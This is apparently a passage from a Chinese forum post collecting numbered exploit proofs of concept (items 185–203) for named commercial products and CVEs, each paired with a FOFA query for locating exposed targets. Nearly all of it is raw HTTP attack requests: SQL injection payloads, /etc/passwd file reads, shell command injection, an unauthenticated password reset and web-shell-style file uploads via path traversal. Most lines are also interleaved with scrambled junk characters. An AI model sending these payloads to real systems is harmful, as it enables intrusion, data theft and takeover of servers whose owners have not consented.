insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')4 @7 Z; D7 X; T7 p1 w
$ E5 ?) ]4 O" p1 R9 \- ?
+ I W5 ^" q# E8 Q, o6 V% v$ V
185. 瑞友天翼应用虚拟化系统SQL注入
0 Q6 T2 t. d- Xversion < 7.0.5.11 x M x) b; ]/ E+ q |1 H" x
FOFA:app="REALOR-天翼应用虚拟化系统"6 ?9 ?" {* z$ p2 d& g
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
, |2 }- J( T* Y- b( z+ ~Host: host
' l2 c" ~, x3 U W! V* j% U1 _* G, q" h: c1 Y4 ^ @
2 R8 ~; v% c; C9 Z" `+ L, @
186. F-logic DataCube3 SQL注入
+ E1 a) V$ O+ o4 H4 S! L0 SCVE-2024-317500 m+ K( k4 P- S; A. A: k5 f
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统! n7 x% j5 F5 k' n$ |* L$ y8 f
FOFA:title=="DataCube3"6 f. h3 j' e) l: f
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 H7 ^- W$ T1 i$ X
Host: your-ip
4 y% D( K0 [) V6 p3 `! ?4 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
: X/ p8 m3 Y0 P# {/ _+ h$ ~8 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
+ {, I' G1 Z* L2 R5 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, o& C* O* s- f
Accept-Encoding: gzip, deflate
8 M' N& O* g G9 |2 Q7 I9 }4 zConnection: close
. x8 A7 ]4 N1 W% M' v7 tContent-Type: application/x-www-form-urlencoded
# U% t/ ?4 @1 W' K7 L6 U& N
1 y0 f' c S0 s1 S/ preq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14503 w7 ^5 x( {* M+ C" W/ }/ u' s- g
3 S5 k4 e3 q8 r2 t! N
z9 H) p' I+ E, x) i0 E; P4 h
187. Mura CMS processAsyncObject SQL注入
& w/ J5 C' ?! [5 F. a5 K4 wCVE-2024-32640; `5 n5 ? ~3 [; I; L
FOFA:"Mura CMS"; u9 H: y' g! \0 f" G
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
5 t/ V7 e6 a- [1 M" AHost: your-ip5 X+ i; P% C2 ]7 ?* s' E1 |! g
Content-Type: application/x-www-form-urlencoded
( i+ J. B+ N% o' T; l' W% T
- b8 N. }' I* a1 _0 t% q% {1 _
: D2 i, D; ^8 f3 X5 C' nobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
! S: ]: I3 ~( a/ ?$ v4 c. q( `0 V: q# u0 Z: ]" ?+ C
# L; F A0 B7 Z9 _4 i& z188. 叁体-佳会视频会议 attachment 任意文件读取' _- o2 y/ S _! M1 Z7 C
version <= 3.9.7) g& e" \3 O- u. {% A6 L2 L3 i
FOFA:body="/system/get_rtc_user_defined_info?site_id"
) U; W& ~5 i. B" F: \GET /attachment?file=/etc/passwd HTTP/1.1, a8 p& M& I% n( s$ A. b
Host: your-ip }+ M0 z8 Y2 p$ P* a' r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 b4 z5 _$ U# |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 D& k1 G6 o# D9 R! |Accept-Encoding: gzip, deflate
& j" X' n& a3 l6 Y zAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' X& b9 Y8 L9 y/ L+ WConnection: close4 n: ^% D& w! P) Y9 {% H( h X
& m) L! C8 T- V0 p" T& F9 `9 L" r# `* w. S/ u! D) @ r
189. 蓝网科技临床浏览系统 deleteStudy SQL注入3 \+ e8 v* D: U( c( m7 x
FOFA:app="LANWON-临床浏览系统"
2 r8 V2 U; ~5 O/ ?3 tGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.12 A% o, T+ N+ K; o$ r
Host: your-ip- T# K) h) y3 a% w/ N- Y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 }5 ?& ^' a8 i* j; Y2 B" w* L) ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& B) {2 t0 P! ^; w1 ]5 ]3 b
Accept-Encoding: gzip, deflate7 c x1 d5 ]/ o
Accept-Language: zh-CN,zh;q=0.9 k" Y! P1 o) @- `2 v% d. o8 s
Connection: close
% v' t) F, u$ p
! V2 @- S- d) X9 j7 [* m7 O5 i/ b* T7 L4 f
190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 E$ k6 g1 p ?* @0 ]
FOFA:title=="短视频矩阵营销系统"; E/ M- L K3 t! q8 k4 v
POST /index.php/admin/Userinfo/poihuoqu HTTP/2$ [5 V* R B3 g4 _* H* U9 H2 G
Host: your-ip
2 D8 U5 m4 i. |% nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
, }* g% K: F" Z: j9 x' O7 Q7 r6 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: v4 H! I3 e% A$ F4 j, T& O
Content-Type: application/x-www-form-urlencoded0 p/ X4 l+ s: L; h
Accept-Encoding: gzip, deflate
: b* P. p# I4 a) m9 o4 fAccept-Language: zh-CN,zh;q=0.9/ x0 q+ Z* t$ b" V% @6 a) t! E
" ?% E" P& B! j5 ^
poi=file:///etc/passwd- x: ~% L9 w( O- \: s# e
7 @7 q. F; @; E3 s: i2 Q& [) F" a
1 C* |4 k- ?4 F1 x191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入, ^. p- X) h3 q+ t' L- D
FOFA:body="/CDGServer3/index.jsp") v1 w P& C+ H1 z& e5 r
POST /CDGServer3/js/../NavigationAjax HTTP/1.17 i% Z/ r. v1 e1 A
Host: your-ip5 \7 G; R D' e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. s$ L5 h* Z6 w M' p
Content-Type: application/x-www-form-urlencoded) y- g* k7 |; V, w! E# j0 z
" e; o4 I5 n5 Ycommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
e& P( L# z7 Q9 T( }* R+ D& f E4 I( N
1 ~ {2 h$ X7 R" B* V% g192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
6 D7 x* n# |0 u! b) ?4 Q+ ?FOFA:title="用户登录_富通天下外贸ERP"* u" K1 C: E* s$ L a
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
' n `& d' M5 Z9 pHost: your-ip& ^! ^7 k% h* d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
6 r# o+ X! p. s1 D7 b$ u6 F# L* o5 VContent-Type: application/x-www-form-urlencoded5 n6 U# z& R- A' V0 g( y
" W" X/ H5 {. \# V% u( _& t
+ K0 Y' i4 _# i. }( W<% @ webhandler language="C#" class="AverageHandler" %>
( c4 e( p1 X. m( ` iusing System;
* M6 K" D& Q$ d/ }using System.Web;
2 p t2 a) |3 ypublic class AverageHandler : IHttpHandler
9 x1 z$ y% s" b{
3 |. l- U7 ^3 w: ~) x2 c0 v0 Wpublic bool IsReusable( h( s. L. _1 E' \: o+ y+ k" B
{ get { return true; } }
& f$ O; W. C" y( v5 s' f, |. [public void ProcessRequest(HttpContext ctx)
9 Y# [( c6 P. ^5 u. j5 s{
6 Z4 [2 U6 R! f5 n5 F9 Bctx.Response.Write("test");) e" g$ E/ l4 N" N, `
}
, r1 m3 H% o. ?1 s( Y, {}$ M, f8 f B* R$ W' x
% V6 e# E( V) n- f+ n
6 `; ~# n* s/ C3 m
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行' t3 a" D {4 z/ f
FOFA:body="山石云鉴主机安全管理系统". l! @" \8 p6 b3 n) n, ^
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
% f' R& i, y# p% ?( _0 T. O. a1 n- }Host:
; }2 y9 S2 W9 o+ n5 k3 uCookie: PHPSESSID=2333333333333;
& K; N6 u) L' @0 }Content-Type: application/x-www-form-urlencoded
7 U# q9 ]3 l+ fUser-Agent: Mozilla/5.0
( N8 f! f& n. g. S6 b9 U0 m2 }. t0 A+ q0 `+ L
" U6 Q, U$ @+ J5 T
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
# l1 x9 m) z3 ^! x; ?4 v, S# n5 FHost:
5 @# U$ [) z3 ^1 J2 `& wUser-Agent: Mozilla/5.0
, H! K1 M+ ^. V& u4 h/ FAccept-Encoding: gzip, deflate
( O9 h; t: e2 ^Accept: */*5 S3 `+ u, f; {$ F
Connection: close
- x) X1 G6 V% ?% FCookie: PHPSESSID=2333333333333;
! q, t6 ]% D! OContent-Type: application/x-www-form-urlencoded
9 S8 J( o j$ PContent-Length: 84
E& a; ?2 I y' s1 w* o. n% y2 z- \1 i, [6 Z$ P) ^
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')* T/ y- |3 v% d# O% j
2 E, X0 f: s4 Z& c
H' `' F5 W2 s \6 c- uGET /master/img/config HTTP/1.1/ ?" Q# }% @% W- v; r9 ~
Host:
' Q B: x0 Q6 K1 q: P/ o- b- ]. JUser-Agent: Mozilla/5.0
3 f: |6 c+ G, q5 }1 Z# j. w" {1 r6 O' U7 I$ {
. Y0 [- z. W9 _( k5 w5 z" N194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 C5 O6 o) m8 K, I3 S9 H5 n2 t4 g
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在4 \6 L& c5 s7 g6 N2 [$ B. C9 V
( k# Z4 H$ I/ {" U8 C8 b; iPOST /servlet/uploadAttachmentServlet HTTP/1.1/ ?2 B5 C# e% n1 l
Host: host
2 K: X: h/ e: S8 d' h8 x zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36- @3 M+ J( t" A$ q: x9 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 g! A( {$ J( B# t' G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" G# [" f$ \5 d1 ?% e+ w
Accept-Encoding: gzip, deflate
, U* G6 S) y8 l6 ^5 EConnection: close
7 d% _- z6 S5 F L8 e0 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk' o9 J0 J" Q5 Z, \5 _+ @) t6 a3 ^
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
6 b# G: ^7 r/ a5 i. W
- K6 t6 G" [1 r/ R# WContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
; r' S P) K. w8 D9 D6 H) l& G XContent-Type: text/plain, V% S! I& `( B: b7 M2 ^
<% out.println("hello");%>
, _6 r5 F4 ~0 |: J------WebKitFormBoundaryKNt0t4vBe8cX9rZk, }9 f. E( }! V1 X$ K- S8 ~1 e
Content-Disposition: form-data; name="json"8 {1 q: q' U( }2 ?$ q
{"iq":{"query":{"UpdateType":"mail"}}}- P$ t; u% m4 U" A5 m
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--& {9 F: W7 {* B7 x; j
" B+ `% P% `+ h1 d( y8 O) O8 E
- {. p1 ~5 v1 `; Y* P3 ]% a+ b/ @195. 飞鱼星上网行为管理系统 send_order.cgi命令执行) p& w. O+ p/ ]6 g
FOFA:title=="飞鱼星企业级智能上网行为管理系统& H2 T. W% h+ B( C
POST /send_order.cgi?parameter=operation HTTP/1.12 X) I1 n5 }) O! ]3 G4 E. u
Host: 127.0.0.1
7 ?! Y% r' @) z) L8 h' q. r4 xPragma: no-cache; b0 X4 p- W# O3 G* C
Cache-Control: no-cache
$ q$ {0 }1 r/ u# W8 _7 C- vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" c- d1 c" a, W" d1 ZAccept: */*+ ?7 V0 s$ o+ {! D3 y' u
Accept-Encoding: gzip, deflate
2 }1 j0 n; o! n- C$ W0 S: j8 DAccept-Language: zh-CN,zh;q=0.9
% V; k$ Y8 {, R1 rConnection: close7 x1 P# W9 J1 k9 m
Content-Type: application/x-www-form-urlencoded
, S# W6 @/ _- I% D* X# K1 dContent-Length: 68
6 j& z1 z$ s' m6 e7 A( a: |# r* ^# D B& J# ^0 A
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
" U X! \& _, G! h1 ?
, C0 N/ ~$ e J. O. L7 D4 E2 n3 v8 l {$ d4 \# w9 D
196. 河南省风速科技统一认证平台密码重置% Y) T. `, t" n- m) j5 @1 d
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
( ~ X ~# A. r, kPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 T! N; [/ J- T+ A' sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) {5 B0 b- g# v: m1 Q/ k
Content-Type: application/json;charset=UTF-8
: H7 Y$ P6 K* L- X7 q8 yX-Requested-With: XMLHttpRequest
) a Q$ g0 R3 m. u! |& YHost:- Y5 ~# K5 t6 p* s m# `
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
: t; f' l8 q/ p# hContent-Length: 455 b$ W5 C3 s N4 q) z% w; U4 e
Connection: close$ t! R t% v' L) s3 B, C
/ g( x, O3 s/ v9 V4 D; T{"xgh":"test","newPass":"test666","email":""}
( v; t4 d, m" R' K) S
1 Q5 k( d, R( |, c' U `5 F/ E: D0 f$ | E
) {5 M: l1 ?5 c1 k& B: z5 w1 S197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ s( B$ |2 o5 C8 M6 I
FOFA:app="浙大恩特客户资源管理系统": @- N' p+ K' w
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
0 h' U. ?1 n/ q* B; w) {Host:1 H+ K& D. C' q. U# o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+ X0 k2 [. @% T7 X" q7 BAccept-Encoding: gzip, deflate
. N! K" n6 P2 JConnection: close
i8 F& v, l3 n, k: y) |8 Q" ]0 B: x& v
8 u- z" }0 r. Z+ G$ N
: a$ [8 I8 S) c) e4 Y' ~2 x198. 阿里云盘 WebDAV 命令注入5 `# Z: a, H! [
CVE-2024-296408 L1 u' w1 t& {
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.16 e! j/ y# f- V
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf645 d6 W5 `! b. u& a
Accept: */*
2 }$ e( J6 U+ w, DAccept-Encoding: gzip, deflate
3 ?& V. U/ _8 c9 x/ l7 u6 _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6+ R* O& |4 F7 W
Connection: close3 J1 R+ v$ G( E2 k* m/ k
. l! v1 z/ w6 B) Z, M
- r6 `% y) V( W% m) S3 E199. cockpit系统assetsmanager_upload接口 文件上传
2 W1 G8 S8 D0 X1 n* F/ o
}' s8 I/ R" L7 Y1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
3 |2 E3 G+ X7 BGET /auth/login?to=/ HTTP/1.1
2 {9 K3 q2 v3 e' A6 N4 x, f6 u4 J/ M- ^1 }9 p% Q
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
0 y- D" H7 s; H
1 H& @: U, X- ]& C2.使用刚才上一步获取到的jwt获取cookie:
$ p* ^4 j# ?% I: {6 V* r4 G. U' N4 ~% Z: k B
POST /auth/check HTTP/1.1
8 N3 e1 L9 C# D2 I ]/ sContent-Type: application/json: |! l+ D9 g& h) ]
! c6 V# B8 S+ U) ]' ?
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}4 f! j2 P5 c5 W; g; z. j
9 Q9 _1 r6 c0 V, }$ W, f
响应:200,返回值:
3 m6 S+ N s5 M6 ~) x" ?4 bSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/. X; k5 A4 _* T* J
Fofa:title="Authenticate Please!" \% H2 x- j5 m9 ?# W
POST /assetsmanager/upload HTTP/1.1
0 K U- x s% G. }Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
( D$ Y! P* ]. A9 ?1 vCookie: mysession=95524f01e238bf51bb60d77ede3bea92 p t3 v: @$ B" ~) r; B
/ ]) ?9 Z% P. f1 |$ A-----------------------------36D28FBc36bd6feE7Fb36 q) O0 r0 t' F8 O: i
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
3 H7 n$ S& ~; C8 rContent-Type: text/php$ C% v/ k& ]8 F
1 f$ x6 O/ R7 J8 r ?3 k8 p
<?php echo "tttt";unlink(__FILE__);?>( R [# c/ u# e. }# D, a
-----------------------------36D28FBc36bd6feE7Fb3
7 n: F2 N) Y0 P- p7 bContent-Disposition: form-data; name="folder"
3 S5 ~* _% A4 }/ }- {8 }: [0 q6 y$ O6 A6 q/ w9 ?- v2 k4 `9 z
-----------------------------36D28FBc36bd6feE7Fb3--
/ S! R) I& o$ X* H( B/ i- P$ M5 S9 d
: z* L4 f9 L! D6 Z$ W+ {
/storage/uploads/tttt.php+ r: i5 I3 A1 i. C
( n* N" \. R0 c
200. SeaCMS海洋影视管理系统dmku SQL注入) l M5 G7 \! l3 f
FOFA:app="海洋CMS"# J a8 x& n5 M; I
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1; M/ S5 | Y0 |0 o/ ?* I# v8 J
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
! r3 o4 F- j1 F& j9 @Upgrade-Insecure-Requests: 19 B, B7 Z) [# T+ L9 D. F
Cache-Control: max-age=0, `4 V" u- V2 j- i5 N9 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( C$ T" N: ]' e9 J
Accept-Encoding: gzip, deflate
9 d' S X6 |: z* y% MAccept-Language: zh-CN,zh;q=0.95 T) \, t+ q0 S0 h7 a
+ X. M4 L8 Y6 U% r( [
$ S& j' n/ _$ O5 y201. 方正全媒体新闻采编系统 binary SQL注入 K4 F* n0 t) L* j) l: b _% f
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"2 x1 h4 j9 v, r$ |: _, ~
POST /newsedit/newsplan/task/binary.do HTTP/1.1
& r. L9 t; j* l: M7 }7 uContent-Type: application/x-www-form-urlencoded6 Y( `9 E. m; z1 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 K( {6 _; p( a
Accept-Encoding: gzip, deflate$ k$ K9 Y2 `# d; O- J
Accept-Language: zh-CN,zh;q=0.9
/ T% ]4 w) ?! ~9 j6 pConnection: close; {$ M$ P* U7 |
/ R5 K% a; o! m
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1# r: X9 ]# `* r
1 g+ T8 n, r& a+ j e5 O1 I/ ]9 a
- U! D7 q% Z4 F( y202. 微擎系统 AccountEdit任意文件上传- e# o8 `! {' Q( m. b
FOFA:body="/Widgets/WidgetCollection/"
1 E5 M' D1 E( c( O9 X; D5 J获取__VIEWSTATE和__EVENTVALIDATION值
% d5 c' k2 l$ Z0 g3 F% H+ S% G" lGET /User/AccountEdit.aspx HTTP/1.1; Z8 v3 S2 P3 i: }7 r3 ?3 q
Host: 滑板人之家' h, v' o3 R4 I7 G2 T- U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31! {5 S9 Q, I4 \$ k& |# B# c8 F' ?
Content-Length: 03 p2 o$ }' w1 `1 ^# ~1 d
* i7 L+ P& R+ \1 c7 f4 G
9 g9 @. B0 i( }
替换__VIEWSTATE和__EVENTVALIDATION值
6 ~. W6 L& }4 F$ h d3 w( mPOST /User/AccountEdit.aspx HTTP/1.1
/ K- U4 P" Q1 n* SAccept-Encoding: gzip, deflate, br& T) V$ o3 f& ]1 H4 N7 ~% R
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
L0 N! {0 |. E s. q# ?' O- d+ Z5 E# W
-----------------------------786435874t38587593865736587346567358735687
6 q4 L3 t, f7 e5 D, J3 ^4 W9 NContent-Disposition: form-data; name="__VIEWSTATE"
+ J) N- @) F7 S4 ]
0 [+ S: e/ f: G; o- S s( n: {. L3 p( {__VIEWSTATE
- @- X3 _6 z$ p5 E0 i e; u a-----------------------------786435874t38587593865736587346567358735687" h* j$ [. G, f1 ^5 i9 o# X' o ?
Content-Disposition: form-data; name="__EVENTVALIDATION"' M4 p% B: d t: u. t
) @: \: K$ S% {8 W' F
__EVENTVALIDATION
4 _9 e) } V b6 q1 ^6 X-----------------------------786435874t38587593865736587346567358735687* A! J! Z2 l$ W4 M( r' X& t* @
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"0 J' D2 S" o0 O# i6 y
Content-Type: text/plain
/ i$ O4 O2 d: t8 Z1 j6 J% [' D' S* M& j6 h( j
Hello World!
/ U9 n# b" |- V2 D) ^/ ?-----------------------------786435874t38587593865736587346567358735687" i" @8 L9 T5 N
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"- x4 j( @4 M9 ^1 A' x( m
+ @. s7 V9 t, S! b, `: d
上传图片9 e6 e( J% V) \1 X+ Z- z. h
-----------------------------786435874t38587593865736587346567358735687' B/ k5 S! \7 i$ [& k
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
1 g: G! h) `' Y+ E6 Q) I0 ^* E( x. Y6 [
2 Y3 ]7 E7 @: p _
-----------------------------786435874t38587593865736587346567358735687
# ^, T1 w1 T/ H, qContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
7 O4 g+ {2 G: p- ^4 M. ~5 x
; H8 k) e' L ^( @3 i, y- F
8 t% W; Z: r1 X3 B$ u-----------------------------786435874t38587593865736587346567358735687--
3 X' a. x8 ?; j- A
) p* h- L7 t* X4 b; D/ A- `* l' M/ i" z2 A' t6 _7 D: k7 x2 _
/_data/Uploads/1123.txt3 i( J# f6 {6 B4 {& e" ]
% u6 Z& t" _0 E# v' }203. 红海云EHR PtFjk 文件上传
# ]6 z; V. f( xFOFA:body="RedseaPlatform"$ t8 b: s- a% b( C/ z, {9 s
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.18 Q+ c8 ^: i! R8 \: @1 P
Host: x.x.x.x5 }5 F* n% S2 e/ v) s0 l
Accept-Encoding: gzip
- c1 e& T0 @' l- a3 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) ?- b6 d7 h' H: {$ i- X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4$ h6 ^5 Z( L y- @. \- E& X0 j1 B
Content-Length: 210
) P- K" V/ ~0 X( W) M$ A S* _' ~- X* u* E+ r
------WebKitFormBoundaryt7WbDl1tXogoZys4& i) J0 b5 O4 w- n
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
, v& @( a7 V; M I& k1 lContent-Type:image/jpeg# K& V! q& B0 R) c4 Q; ^- z( Z1 a
% n! \$ z' u& S; l- {1 D+ H1 q<% out.print("hello,eHR");%>. s- L# c& h1 H% o
------WebKitFormBoundaryt7WbDl1tXogoZys4--
4 a8 j; u) c/ |* d& G' _/ O+ v- I* ?
$ r' P6 E2 x0 {5 [) ?2 w: w# }1 p2 A% p z& d/ C. [, p" j
, r' [) ~% |/ e8 M% ~( g1 h. H
3 @' M: `+ m }
5 p8 C* h3 i8 }0 q0 d$ @ |
发表于 2024-6-5 14:31:29
收藏
支持
反对